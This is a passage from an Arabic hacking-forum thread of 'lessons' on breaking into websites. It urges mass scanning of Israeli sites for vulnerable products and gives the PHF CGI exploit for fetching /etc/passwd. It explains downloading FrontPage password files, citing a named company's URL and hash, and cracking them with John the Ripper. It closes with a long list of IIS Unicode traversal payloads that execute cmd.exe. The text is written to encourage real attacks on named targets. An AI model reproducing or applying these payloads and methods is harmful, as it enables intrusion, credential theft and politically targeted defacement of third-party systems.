وممكن تأخذ إسم المنتج مثلا وتضعه في محرك البحث لـ http://www.securiteam.com/ وتشوف النتائج ، أو تشترك في القائمه البريده لـ سيكيورتي فوكس فهي مفيده جدا أنا شاركت من قبل فتره وجدا أعجبت بها وهي مختصه في الأمن وليس لـثغرات السي جي آي سكربت ، يعني امن واخبار وكل شئ .... ويوجد برنامج تقدمه سيكيورتي فوكسي بإسم سيكيورتي فوكس بيجر ، هو برنامج لتسهيل عمليه الحصول على الأخبار ووو...الخ


- تطويره بحيث يصبح يبحث على إستثمارات غير الـ CGIScripts
الإختراق العشوائي إذا كان فعلا عشوائي ، يعني تخترق اي موقع ولو بدون سبب فهذه همجيه !! ، لكن ممكن نستفيد منه إحنا في أنه ما يكون في شكل همجي ، أنا اقول لك كيف ، مثلا إسرائيل اللي الكل يكرهها ، الذين يأمرون الفلسطينيين بأوقاف إطلاق النار ، الكل يكرههم ليس لأجل أنهم يهود ، لا نكرههم لأنهم ظلموا فلسطين ، عندهم موقع فيه آلاف من مواقعهم هذا هو 12610 sites تنتهي بـ co.il و 1104 sites تنتهي بـ org.il و 70 sites تنتهي بـ ac.il و 78 sites. تنتهي بـ gov.il وهذه مهمه ، و 54 sites. تنتهي بـ net.il و 29 sites. تنتهي بـ muni.il و 2009 sites تنتهي بـ com ، و 137 sites. تنتهي بـ net و org - 121 sites. و edu - 4 sites. لعينه ، israel.net - 84 sites. و il - sites. ........عشان تحصل على كل هذه السايت روح الموقع هذا http://iguide.co.il/sites/sites.htm

وفيه كمان محركات بحث

http://www.achla.co.il/
http://www.reshet.co.il/data/index.vs?dw=1
http://www.maven.co.il/
http://www.tapuz.co.il/
http://www.walla.co.il/
http://www.info.gov.il/find.pl

وفيه محرك أعدم منها واللي هو altavista.co.il

المهم على كل شخص منا أن يصلح فرز للبيانات الموجوده في هذه المواقع ، يستخدم اللغه التي يتقنها ليصنع برنامج يصلح فرز ويضعها في ملف تكست بدون اشياء ثانيه معها

العمليه الثانيه هي البحث فيها كلها عن منتج ، مثلا w3-msql/ ، الطريقه سهله جدا ، أولا يتم الشبك مع بروكسي مثلا proxy.isp.net.sa :8080 وثم يرسل له أمر GET ، مثلا ترسل للبروكسي


GET http://www.com.il/cgi-bin/w3-msql/ HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
Accept-Language: ar-sa
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98)
Host: www.com.il
Proxy-Connection: Keep-Alive

وهو يطلب من البروكسي أحضار الموقع http://www.com.il/cgi-bin/ ، يتضح طلبنا لـ cgi-bin/w3-msql/ ، في الحقيقه لا نبحث عن ثغرات سي جي آي ، ولكن نبحث عن كل المواقع التي يوجد بها المنتج WWWMSQL ، يعني المواقع الإسرائليه مثلا التي جمعناها في ملف تكست كلها تأخذ واحد واحد وتدخل في البرنامج الذي صممناه وترسل الى البروكسي بحثا عن cgi-bin/w3-msql وثم يحفظ رد البروكسي في ملف خارجي ، وهكذا حتى ننتهي من كل المواقع ، وثم نفتح الملف ونشوف التي تم إيجاد المنتج WWWMSQL داخها والتي لم يوجد ، ونتوجه الى سيكيورتي فوكس والا سيكيورتي تيم والا أي موقع يعجبك وابحث عن w3-msql ، مثلا في سيكوتي تيم نجد Exploit لـ w3-msql يمكن تطبيقه من المتصفح ، وهو هنا http://www.securiteam.com/exploits/2WUQBRFS3A.html
طريقه فحص عده مواقع بحثا عن منتج فيها أسميها انا Random Hacking يعني إختراق عشوائي ، ولكن لو فعلا بحثت عن w3-msql في المواقع الإسرائليه فأنا أقول لك بأنك ما راح تلقى كثير أو لن تجد شئ ، ممكن تبحث عن /_vti_pvt/ لترصد كل المواقع التي فيها فرونت بيج ، وطبعا بعد ما يتم حفظ كل المعلومات المسترجعه من البروكسي تكون بشكل HTML عشان كذا أنت خل الملف يكون بنسق *.html وافتحه وتجد كل المواقع ، اللي كتب عنها ..The page cannot be displayed واللي Forbddien واللي ....not found ....الخ ، من هذه الردود تعرف اللي نت فاوند والا موجود ولكن غير مسموح بالوصول له ..الخ بهذه الطريقه تعرف اللي موجود عليه واللي مو موجود .....والباقي عليك



- كيف تستغل اي ثغره بعد الحصول عليها
إذا كانت url ما يبغا لها فلسفه ، كود c وما عرفت تشغله أو قابلت فيه أخطاء فممكن تبحث عن فرجون ثاني لـه ولكن بلغه perl أو Shell *.sh وهو الذي يقابل Batch في ويندوز وتحدثنا عنها في كوكب لغات البرمجه ، من الدوس بعد ما تثبت أكتيف بيرل أكتب perl exploit.pl إذا كان الـ exploit بلغه بيرل ولكن طبعا فيه أشياء تغييرها في الكود نفسه ، وهذه الأشياء تكون مكتوبه بين علامات التعليقات وأكيد بتواجه مشاكل إذا ما تعرف شئ في بيرل ، في هذه الناحيه لا تطلب شرح بالصور إذا رجع لك رد طويل ما قدرت تقراه ممكن تحفظ الخرج عن طريق علامة < وثم مسافه وإسم الملف مثلا perl exploit.pl > log.htm
وبالنسبه للمنتج أكتيف بيرل فقط تواجه فيه مشاكل ، لأن بعض الـ Exploit كتب في الإصدار أربعه وممكن خمسه وممكن ما يعمل زين في أكتايف بيرل لذلك قد تضطر لتغير المفسر عندك أو تعدل في الكود وهذا كله يطلب خبره في اللغه ، وعلى فكره ليونكس (أعمل على RedHat 6.2 )فيه مفسر بيرل ممتاز جدا افضل من أكتيف بيرل بعشرات المرات



الموضوع اطول من كذا ولكن أنا تجاهلت بعض منه لأن فيه أشياء لو ذكرتها رايح تشب حرب أهليه بين المواقع العربيه
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس الاربعين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:22 am


الدرس الاربعين
مكانيكية المواقع وكيفية الاختراق عن طريق لثغرات

ملاحظة ترى هذا تجميع معلومات ومستنتجات من عندي فاذا خظأت ارجو تصححوني

السلام عليكم راح اشرح اشِوية شلون يشتغل الموقع وعملية الاختراق عن طريق الثغرات
اول شي يوجد نوعين من سيرفر المواقع
اول واحد SSI للي هو يدعم الويندز
وهو سيرفر عادي يوجد به اخطاء كثيرة وممكن اختراقه
والثاني apache يالله شنو هذا وكيف انا اشرح
هذا سيرفر قوي قوي قوي جدا يتحكم بالمستخدم بشكل رهيب ولايمكن اختراقه بسهولة وهو يشتغل على اليونكس واليونكس وصعب تلاقي ثغرات فيه بعدين حتى لو قدرت ثغرات وقدرت تخترقه الباسيورد مشفرة بطريقة عجيبة وفي ملفين للباسيورد وااحد منهم الحقيق يعني بعد تضليل هذا
تصوروا حتى مايكروسوفت تستعمل هذا السيرفر ما تستعمل السيرفر اللي هي مصصمته وذلك يدل على مدى قوته
صممه مجموعة اسمه apache وهي ليست من دولة وحدة وانما عدة دول خلينا.
نشرح شلون يشتغل الموقع:
انته تدخل على الموقع
تجي مثلا تريد تدخل الموقع هل تعرف كيف يتم لك الدخول على الموقع شوف هذي مثال على كيف يعمل النظام

المستخدم--------السيرفر---------الستخدم

خلينا نشرح بدقة اكثر انته تريد تدخل موقع في ملفات السيرفر ما يسمحلك تدخل عليها مثل ملفات الباسيورد يعني هو يتحكم بيك يتحكم في الشغلات اللي انته تقدر تشوفها
فانته تريد تدخله تتطلب الاذن من السيرفر بدخول هذي مكان
بعدين يا يرسل السماح او الرفض
هذي العملية بطريقة مبسطة جدا جدا

زين هسه شنو معنى الثغرة ؟؟
الثغرة هي لما تكون تقدر تدخل على كل الملفات وحتى ملفات الباسيورد بدون ما يقدر السيرفر يوقفك او يمنعك فانته لما تدخل على الثغرة خلاص بعد انته امتلكته جيب ملف الباسيورد وخذ الموقع
زين كيف تلاقي الثغرة؟؟؟؟؟؟
عن طريق اي برامج سكان للمواقع واقواها شادو سكان سيكورتي

زين مثلا لقينا الثغرة كيف تستغلها؟؟(مو متاكد ميه بالميه)

اذا كان السيرفرSSI تقدر تدخل بالاكسبليوير بس بمجرد تحط اسم الثغرة
اذا كان الثغرة بالسيرفر apache
تروح ي موقع مال الثغرات مثل
www.root-shell.com
بس هذا هل الايام ما يشتغل ما ادري ليش شوك موقع ثاني
المهم
وتدور باسم الثغرة اللي لقيتها بس على نظام perl
تنزل الملف
بعدين تفتحها وتنفذ اللي يقوله وخلاص انتهى الموضوع بطريقة بسيطة جداا
شوفوا هذي المواقع
http://www.oreillynet.com/pub/faqs/apache_faq_what
www.apache.org
www.perl.org

__________________
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس الواحد والاربعين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:25 am

الدرس الواحد والاربعين
أختراق المواقع

إختراق المواقع ماهو الا شئ بسيط ، نعم بسيط ولكن في حاله واحده وهي أن تتعرف على نظام التشغيل لسيرفر وهي مسأله في غايه البساطه والأمر الثاني ان تكون عالما بالثغرات الموجوده فيه ، وتكون المسأله صعبه إذا كنت تريد تريد إختراق مواقع كبيره ومشهوره ولها هيبه وحمايه عاليه حيث أنك في هذه الحاله سوف تنسى الثغرات الموجوده عندك عن النظام الخادم لهذا الموقع لأن وبالتأكيد قد رقعت وعليك أن تفكر في إكتشاف ثغره في هذا الموقع لتخترقه وهذه الناحيه لن أتحدث عنها لأني لا أعرفها ، ولكن سوف نتحدث عن البيسك سيرفر هو السيرفر الخادم لأكثر المواقع العربيه وهو سيرفر بسيط في الحمايه ,,,
لإختراق هذا النوع من السيرفرات عليك التعرف على نظام التشغيل له ويتم ذلك من عده طريق لتعرف عليه
مثلا نريد اختراق الموقع
www.kondor.com
وهذا موقع ليس مجاني بل هو نطاق له سيرفره ورقم آي بي ثابت وهذا شئ معلوم لدى الجميع
نرسل رساله الى عنوان بريدي خاطئ الى هذا السيرفر وسوف يرد عليك بأن هذا البريد غير موجود في الموقع والبريد مثلا هو
hgguutujfkerh@kondor.com
وهو بالفعل غير موجود في الموقع عنوان بريد بالإسم هذا ، من خلال الرساله التي وصلتك تخبركبأن عنوان البريد هذا غير موجود تستطيع التعرف من خلالها على نظام الموقع ، وهذه واحده من الطرق
ثانيا عليك الآن وبعد معرفه نظام التشغيل لهذا الموقع أن تبحث عن الثغرات له
////////////
////////////
ملاحظه مهمه
////////////
////////////
قد يخترق أحد المواقع ويكون السبب ليس نظام التشغيل ، بل يكون أحد البرامج المثبته عليه مثل ملفات سي حي آي وقد تستخدم لجلب ملف الباسورد المسمى دائما بـ passwd وهناك حادثه مثل هذه في إصدارات WWWThreads للمنتديات

/////////////////////////////////////////////////

لنفرض انك تبي تخترق سيرفر بسيط وقليل الأمن وهذا النوع منتشر بكثره بكثره نعم بكثره ، عندها سوف يكون إختراق هذا النوع والحصول على الباسورد فايل امر في غايه البساطه نعم في غايه البساطه ولاداعي بعد ان تخترق بأن تقول لمن يطلب منك جواب لسؤال .. كيف ؟ ان ترد عليه بأن العمليه معقده وهذا الرد كاذب
مثلا أدخل على السيرفر في وضع التخفي
anonymously (( إستخدم التلنت في هذه الخطوه ))
وانظر الى المجلد المسمى بـ
etc
وأطلب الملف
passwd
هل رأيت ... هي عمليه بسيطه ولكن قف ! الملف يحتوي على كلم السر الخاصه بالموقع وغسماء المستخدمين للسيرفر وكلماتهم السريه ولكن كلماتهم السريه تكون مشفره
طريقه أخرى لإختراق هذا النوع من السيرفرات
أبحث في الموقع المستهدف من خلال المتصفح عن يا ترى وجود سي جي آي
عند توفره أطلب الملف التالي
cgi-bin/phf?Qalias=x
/bin/cat /etc/passwd
مثلا عنوان الموقع هو
www.kondor.com
نكتب هكذا
www.kondor.com/cgi-bin/phf?Qalias=x
/bin/cat /etc/passwd
عندها سوف يرسل لك الملف
passwd
وسوف يكون في الملف إسماء وكلمات السر المرخص لهم دخول السيرفر ولكن قف هناك أمر حيرني كثيرا وجاب لي الصداع وحيث اني ذهبت لتصميم برامج لفك التشفير عن كلمات السر فهي مشفره وأنتهى الأمر بي البرنامج الذي صمم على يد أحدهم !

الآن سوف أضع أسئله وأجوبه لتسهل الفهم
س: ما الملف
passwd
وهل الحصول عليها يعتبر من الأشياء المسموح عرضها ؟
ج: الملف
passwd
يحتوي كلمات السر وأسماء المستخدمين المسموح لهم دخول جهاز السيرفر وهو غير مسموح بعرضه ولكن هناك ثغرات وطرق ذكرنا بعضها أو القليل منا وسوف نذكر أكثر ، المهم عند حصولك على الملف سوف تشاهد مكتوب فيه هكذا مثلا


Sources Code - شفرة

root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:
FTPUser:/export/home/ftp:
kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor



إحنا علينا من السطر هذا
kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor
ولتفسيره نقول بأن
إسم المستخدم هو
kondor
وكلمه السر المشفره .. حط خطين تحت كلمه مشفره هي
yu&rte6745kd
وايضا
User number: 201
Group Number: 4
Real Name (usually): Richard Clark
Home Directory: /export/home/rrc
Type of Shell: /bin/ksh
الآن فهمنا ماذ يعني السطر هذا السطر من الملف passwd
kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor

حاولت أن تعرف من هذه شئ
admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0:
Regular Admin login:/admin:/sbin/sh
bin:*:2:2:Admin :/bin:
sys:*:3:3:Admin :/usr/src:
adm:*:4:4:Admin :/usr/adm:/sbin/sh
daemon:*:1:1: Daemon Login for daemons needing
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh
س : هل اي ثغره تنجح ؟
ج : لا طبعا ، لابد ان تكون عارفا لأي شئ هذه الثغره ولأي نظام تشغيل وهل يلزم أن يكون مع نظام التشغيل برنامج آخر ليتم الدخول على السيرفر أو على الروت ، وكل هذه المعلومات لابد من توفرها
مثلا الموقع alsahat.net يعمل على نظام لينكس
وقد يكون لثغره أن سبق ورقعت
س : هل يختلف تشفير كلمه السر من نظام لآخر ؟
ج : هذا شئ أكيد ...
س : هل هناك برامج مخصصه لكلمات السر لكل نظام ؟
ج : نعم ، مثلا برنامجي المفضل لكسر شفرات الكلمات السريه (passwd) لنظام يونكس هو Brute ولكن للأسف أنا لا أملكه الآن وهناك برنامج آخر قد يكون أفضل من سابقه وهو Cracker Jack 1.4
)(
إعذروني لن كان كلامي مو مرتب
)(




شكل الكلام والله مو مرتب ... عشان كذا بعيد أكتب لكم بتعمق أكثر والكلام اللي فوق هذا مجرد مقدمه
بكتب بالعاميه ازين لي ولكم
مو لازم تعرف الكلام الي سبق ذكرته لكن إفهم منه جواب السؤال :: كيف يتم :: فقط

=== نبداء من هنا وبعمق ===
عرفنا ان الملف
(سوف نسميه من الآن بإسم ملف الباسورد )passwd file
يحتوي على إسماء المستخدمين المرخص لهم الدخول الى السيرفر وكلماتهم السريه وعرفنا أيضا أنها مشفره ولكن ضع كل تفكيره في الحصول على ملف الباسورد وأترك كيفت كسر التشفير في النهايه فهي تعتبر بسيطه
فمتو كل اللي راح ,,,, تمام

إستغلال الثغرات
اولا ما هي الثغرات ,,, الثغرات هي حفر وهفوات في السفت وير فقط وتمكن أي شخص من الحصول على ماعلمومات أو نشر فيروسات من خلال هذه الثغره
من ضمن هذه الثغرات ، ثغره سبق وذكرتها لكم في هذا المقال وهي في ملفات السي جي آي واستخدمناها لإختراق الموقع
www.kondor.com
ونورد عنها الآن تفاصيل
تسمى هذه الثغره الأمنيه بـ
PHF
ومعظم السيرفرات تمتلك هذه الثغره والى الآن لم يتم رقعها مع الأسف (إذا وجد عنده سي جي آي فقط ) !:! إذا نجحت هذه الثغره فسوف يعرض لك ملف الباسورد ، زي هذا مثلا

Sources Code - شفرة


root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid
nobody:/:noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:
FTPUser:/export/home/ftp:
kondor:yu&rte6745kd:4:RichardClark:/export/home/kondor





كما ذكرنا سابقن (كتابه سابقاً هكذا سابقن أفضل ) لووول
أحفظ الملف في تكست او مستند نص عشان تسوي له عمليات لكسر التشفير

FTP Passwd
بعض السيرفرات تحفظ ملف الباسورد في الإف تي بي نفسه ، أي تستطيع الى حد بعيد أن تحصل على ملف الباسورد من خلال دخولك في وصع مخفي
anonymous logins
والدخول بالوضع الخفي شئ قانوني ، وتسحب ملف الباسورد من الهدف المحدد ، غستخدم احد هذه البرامج لهمل ذلك
WS FTP or CuteFTP
وبعد ماتدخل بالوضع الخفي راح تجيك لسته أو قائمه
إختر منها
etc
وراح يعرض لك عدد قليل من الملفات مثل هذا
"group, passwd"
وملف الباسورد مو شرط يكون إسمه
passwd
ممكن يكون غير كذا .. المهم أنت أسحبه وإفتحه ولو شفت إسم مثل
"root, daemon, FTP, nobody, ftplogin, bin"
وإذا لقيت بالقرب من هذه الكلمات رمز نجمه كهذه * وقد رمز آخر مثل علامه إكس فقط ، لن ينفعك الإستعانه بأحد الكراكر ولكن كل ماعليك أن تتعقب الباسورد ويجب ان تبحث لحل لهذه المشكله فأنا حتى تحصل على مثل هذا
"joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
والآن إستعن بأحد الكراكر لكسر كلمة السر او حاول عن طريق البرامج الذي ذكرتها لك سابقن

س : ماهو إسم المستخد هنا وماهي كلمة السر المشفره ؟
جاوب أنت .... !:!

التعقب لملف الباسورد
الآن وبعد أن حصلت على مثل هذا
"joetest:*:102:100::/home/joetest:/usr/bin/restsh"
فأنت الآن تملك
shadowed passwd
فهذا يتدلى في نظام التشفيل ولكن الـ
passwd file
يختلف (لا داعي لتعمق اكثر ) والملف
passwd file
هو الذي نجد كلمة السر فيه مشفره وليست رمز واحد مثل * أو x
و الـ
shadow file
يكون مكان كلمة السر نجمه أو رمز
وأنا الى الآن لست متأكد من هذه النقطه
الرجوع الى أعلى الصفحة اذهب الى الأسفل
هكر بغداد
عفروتو مرعب
عفروتو مرعب
هكر بغداد


ذكر
عدد الرسائل : 820
العمر : 39
ساكن فين : السويد
تاريخ التسجيل : 17/05/2007

كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 Empty
مُساهمةموضوع: الدرس الثاني والاربعين   كيف تصبح هاكر محترف ... دروس من الالف الى الياء ... - صفحة 2 I_icon_minitimeالإثنين أغسطس 06, 2007 4:27 am


الدرس الثاني والاربعين
الطريقة الصحيحة والمثلى لإختراق المواقع






طبعا صارللي سنتين اتعلم شلون اخترق مواقع
وهاي اخر استنتاجاتي

اول خطوة في الاختراق واللي هي اخذ المعلومات

يعني نعرف الموقع الفلاني شنهو الملقم اللي شغال عليه والنظام والخدمات اللي يدعمها.

الملقمات اشهرها اثنين

IIS: من مايكروسوفت وهذه مليانة ثغرات. (ومواقع قليل مقفلة ثغراتها)

apache: من مجموعة مبرمجين متوزعين في انحاء العالم واختراقها شبه صعب.

طيب

الحين عندنا موقع

وشلون نعرف نظام التشغيل والملقم والخدمات والمعلومات كلها

عندك الموقع http://www.netcraft.net

ادخله

تلاقي مربع

هنا تحط فيه الموقع اللي تبي تعرف المعلومات اللي فوق

مثلا نحط موقع البيت الابيض اللي هو whitehouse.org

ملاحظة: نكتبه من غير http:// ولا / اللي بالاخير

http://uptime.netcraft.com/up/graph....whitehouse.org

راح يطلع لنا التالي

The site www.whitehouse.org is running Microsoft-IIS/5.0 on Windows 2000
طيب

الحين عرفنا معلومتين مهمتين

اول شيء انه شغال على الملقم IIS5.0

ثاني شيء شغال على نظام ويندوز 2000

حلو

اول شيء نجرب ثغرات IIS5.0 عليه (راح احطها بعد الموضوع)

إذا مانفع شيء نشوف ثغرات نظام ويندوز 2000 (راح احط الموقع بعد الموضوع)

طيب

الحين فيه حاجة اسمها يوني كود

هذه تخترق فيها عن طريق المتصفح

وماتمشي إلا مع ملقمات IIS وهي عبارة عن عناوين طويلة تحطها بعد عنوان الموقع. راح احط امثلة عليها.

طيب لنفرض انه ماطلع فيها ثغرات؟

نشوف محتويات الموقع نفسه

نشوف إن كان عنده سجل زوار او منتدى او او او ونطلع ثغراتها من الموقع اللي راح ارفقه في الرد اللي بعد الموضوع.

طيب لو كان السيرفر اباتشي؟

خلونا ناخذ مثال موقع ارانك www.arank.com

لو حللناه بالنيت كرافت راح نشوف النتيجة التالية

The site www.arank.com is running Apache/1.3.20 (Unix) mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6 mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux

طيب هنا يهمنا ثلاث اشياء

الملقم وهو apache 1.3.20 و دعم فرونت بيج FrontPage/5.0.2.2510 وهذه مليانة ثغرات والثالث النظام وهو Linux

طيب

الملقم

اول شيء اباتشي من الملقمات الصعبة الإختراق إلا بعض الإصدارات منها فنحط هذه على جنب.

نشوف دعم الفرونت بيج

زي ماقلنا الفرونت بيج مليان ثغرات

وثغراته قوية وكثيرة تقريبا

منها مجلد _vti_pvt و _private هذه اللي نحتاجها غيره مامنه فايدة

داخل المجلدين راح نلاقي اربع ملفات مهمة وهي service.pwd و users.pwd و authors.pwd و adminstators.pwd ويعتبر هذا اخطر ملف

طيب لو قدرنا ننزل واحد من الملفات هذه (ملاحظة الثغرة هذه موجودة ب 70% من المواقع الموجودة عالنت) لو نزلناها نفتحها بالمفكرة ونلاقي السطر هذا على سبيل المثال
goodyco:CalXS8USl4TGM

وهذا من موقع قودي http://www.goody.com.sa/_vti_pvt/service.pwd

طيب الحين goodyco اليوزر والباسس مشفر واللي هو CalXS8USl4TGM

وشلون ينفك؟ ينفك ببرنامج اسمه john the repaier

تنزله وتحط الملف المشفر (مع اليوزر) بمجلد واحد وتفتح الدوس وتروح لمجلد جوهن وتكتب السطر التالي john -i PASSWORD.FILE

وعاد استناه يطلع لك الباسس

طيب نروح للفقرة الثالثة واللي هي النظام

زي ماشفنا النظام هو لينكس

لكن لينكس ايش؟ فيه ريد هات و ماندريك وفيه منه إصدارت كثير وثغرات اكثر

لكن هنا راح تواجهك مشكلتين

اول شيء معرفة النظام تقدر تطلعه من ابدا وتشغيل ول telnet واكتب عنوان الموقع يطلع لك النظام فوق نوعه وإصدارته

المشكلة الثانية لازم يكون عندك لينكس اصلا

علشان ثغراته بلغة ال c وهذه ماتشتغل إلا عاللينكس فقط

================

http://neworder.box.sk/ هذا الموقع مفيد جدا تكتب مثلا (فوق بالمربع اللي عاليمين) IIS او apache او منتدى واصدارته او اي برنامج ويطلع لك ثغراته

http://www.ussrback.com/ الموقع هذا خطير جداً جداً تروح ل EXPLOITS اللي عاليسار وتختار اول اختيار هنا ثغرات جميع الانظمة من لينكس و ويندوز و و و الخ.. ومنوعة من c و perl و يوني كود
================

احد عنده اي سؤال يسأل السؤال مهب عيب العيب اننا نقعد جهلة

سلالالالام


بعض ثغرات اليوني كود ل IIS

/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir
/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir
/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25% 35%63../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../%77%69%6E%6E%74/s%79s%74%65%6D%33%32/%63%6D%64%2E%65%78%65?/c+dir
/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/_vti_cnf/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/adsamples/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/adsamples/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/adsamples/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/cgi-bin/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/cgi-bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/iisadmpwd/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/winnt/system32/cmd.exe?/c+dir
/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir
/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir
/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir
/msadc/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir
/msadc/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir
/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
/msadc/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+dir
/msadc/..%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir
/scripts..%c1%9c../winnt/system32/cmd.exe?/c+dir
/scripts/%bg%ae%bg%ae/%bg%ae%bg%ae/winnt/system32/cmd.exe?/c+dir
/scripts/%c0%9u%c0%9u/%c0%9u%c0%9u/winnt/system32/cmd.exe?/c+dir
